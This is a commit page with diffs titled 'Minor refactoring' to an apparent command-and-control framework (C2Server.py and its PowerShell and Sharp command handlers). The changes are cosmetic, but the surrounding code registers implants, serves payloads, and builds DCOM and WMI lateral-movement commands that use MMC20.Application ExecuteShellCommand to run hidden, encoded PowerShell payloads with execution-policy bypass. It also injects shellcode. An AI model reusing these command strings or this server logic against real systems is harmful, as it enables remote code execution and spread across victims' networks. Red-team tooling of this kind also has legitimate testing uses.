Minor refactoring
parent
58a3545499
commit
acfade268e
12
C2Server.py
12
C2Server.py
|
@ -50,11 +50,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
QuickCommandURI = select_item("QuickCommand", "C2Server")
|
QuickCommandURI = select_item("QuickCommand", "C2Server")
|
||||||
s.server_version = ServerHeader
|
s.server_version = ServerHeader
|
||||||
s.sys_version = ""
|
s.sys_version = ""
|
||||||
if s.cookieHeader:
|
if not s.cookieHeader:
|
||||||
r = ""
|
|
||||||
else:
|
|
||||||
s.cookieHeader = "NONE"
|
s.cookieHeader = "NONE"
|
||||||
# class Tasks()
|
|
||||||
|
|
||||||
# implant gets a new task
|
# implant gets a new task
|
||||||
new_task = newTask(s.path)
|
new_task = newTask(s.path)
|
||||||
|
@ -139,7 +136,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
s.send_header("Content-type", "application/x-msdownload")
|
s.send_header("Content-type", "application/x-msdownload")
|
||||||
s.end_headers()
|
s.end_headers()
|
||||||
s.wfile.write(content)
|
s.wfile.write(content)
|
||||||
# class Implant()
|
|
||||||
# register new implant
|
# register new implant
|
||||||
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
|
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
|
||||||
implant_type = "Normal"
|
implant_type = "Normal"
|
||||||
|
@ -264,7 +260,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
||||||
else:
|
else:
|
||||||
print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
||||||
#print decCookie,Colours.END
|
|
||||||
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
|
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
|
||||||
outputParsed = outputParsed.rstrip()
|
outputParsed = outputParsed.rstrip()
|
||||||
|
|
||||||
|
@ -283,7 +278,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
||||||
print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
||||||
# What should this be now?
|
|
||||||
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
|
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
|
||||||
update_task(taskId, "Upload shellcode complete")
|
update_task(taskId, "Upload shellcode complete")
|
||||||
print ("Upload shellcode complete")
|
print ("Upload shellcode complete")
|
||||||
|
@ -360,9 +354,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
print (Colours.GREEN)
|
print (Colours.GREEN)
|
||||||
print (outputParsed + Colours.END)
|
print (outputParsed + Colours.END)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
e = ""
|
|
||||||
# print e
|
# print e
|
||||||
# traceback.print_exc()
|
# traceback.print_exc()
|
||||||
|
pass
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
s.send_response(200)
|
s.send_response(200)
|
||||||
|
@ -384,7 +378,6 @@ if __name__ == '__main__':
|
||||||
print (Colours.GREEN + logopic)
|
print (Colours.GREEN + logopic)
|
||||||
print (Colours.END + "")
|
print (Colours.END + "")
|
||||||
|
|
||||||
# KeyFile = None, CertFile = None, ClientCertCAs = None
|
|
||||||
if os.path.isfile(Database):
|
if os.path.isfile(Database):
|
||||||
print ("Using existing database / project" + Colours.GREEN)
|
print ("Using existing database / project" + Colours.GREEN)
|
||||||
C2 = get_c2server_all()
|
C2 = get_c2server_all()
|
||||||
|
@ -481,7 +474,6 @@ if __name__ == '__main__':
|
||||||
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
|
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
|
||||||
else:
|
else:
|
||||||
raise ValueError("Cannot find the certificate files")
|
raise ValueError("Cannot find the certificate files")
|
||||||
#logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
httpd.serve_forever()
|
httpd.serve_forever()
|
||||||
|
|
|
@ -148,7 +148,7 @@ def startup(user, printhelp = ""):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("cls")
|
print ("cls")
|
||||||
print (chr(27) + "[2J")
|
print (chr(27) + "[2J")
|
||||||
print (Colours.GREEN + "")
|
print (Colours.GREEN)
|
||||||
print (logopic)
|
print (logopic)
|
||||||
print ("")
|
print ("")
|
||||||
|
|
||||||
|
|
|
@ -181,7 +181,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
new_task(cmd, user, randomuri)
|
new_task(cmd, user, randomuri)
|
||||||
|
|
||||||
# wmi lateral movement
|
# wmi lateral movement
|
||||||
|
|
||||||
elif "invoke-wmiproxypayload" in command.lower():
|
elif "invoke-wmiproxypayload" in command.lower():
|
||||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
|
@ -218,7 +217,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
new_task(cmd, user, randomuri)
|
new_task(cmd, user, randomuri)
|
||||||
|
|
||||||
# dcom lateral movement
|
# dcom lateral movement
|
||||||
|
|
||||||
elif "invoke-dcomproxypayload" in command.lower():
|
elif "invoke-dcomproxypayload" in command.lower():
|
||||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||||
|
@ -226,7 +224,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
params = params.sub("", command)
|
params = params.sub("", command)
|
||||||
p = re.compile(r'(?<=-target.).*')
|
p = re.compile(r'(?<=-target.).*')
|
||||||
target = re.search(p, command).group()
|
target = re.search(p, command).group()
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
||||||
new_task(pscommand, user, randomuri)
|
new_task(pscommand, user, randomuri)
|
||||||
else:
|
else:
|
||||||
startup(user, "Need to run createproxypayload first")
|
startup(user, "Need to run createproxypayload first")
|
||||||
|
@ -237,7 +235,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
||||||
p = re.compile(r'(?<=-target.).*')
|
p = re.compile(r'(?<=-target.).*')
|
||||||
target = re.search(p, command).group()
|
target = re.search(p, command).group()
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
||||||
new_task(pscommand, user, randomuri)
|
new_task(pscommand, user, randomuri)
|
||||||
else:
|
else:
|
||||||
startup(user, "Need to run createdaisypayload first")
|
startup(user, "Need to run createdaisypayload first")
|
||||||
|
@ -250,11 +248,10 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
payload = newPayload.CreateRawBase()
|
payload = newPayload.CreateRawBase()
|
||||||
p = re.compile(r'(?<=-target.).*')
|
p = re.compile(r'(?<=-target.).*')
|
||||||
target = re.search(p, command).group()
|
target = re.search(p, command).group()
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
||||||
new_task(pscommand, user, randomuri)
|
new_task(pscommand, user, randomuri)
|
||||||
|
|
||||||
# runas payloads
|
# runas payloads
|
||||||
|
|
||||||
elif "invoke-runasdaisypayload" in command.lower():
|
elif "invoke-runasdaisypayload" in command.lower():
|
||||||
daisyname = raw_input("Name required: ")
|
daisyname = raw_input("Name required: ")
|
||||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||||
|
|
|
@ -75,7 +75,6 @@ def handle_sharp_command(command, user, randomuri, startup):
|
||||||
try:
|
try:
|
||||||
shellcodefile = load_file(path)
|
shellcodefile = load_file(path)
|
||||||
if shellcodefile != None:
|
if shellcodefile != None:
|
||||||
arch = "64"
|
|
||||||
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("Error loading file: %s" % e)
|
print ("Error loading file: %s" % e)
|
||||||
|
|
Loading…
Reference in New Issue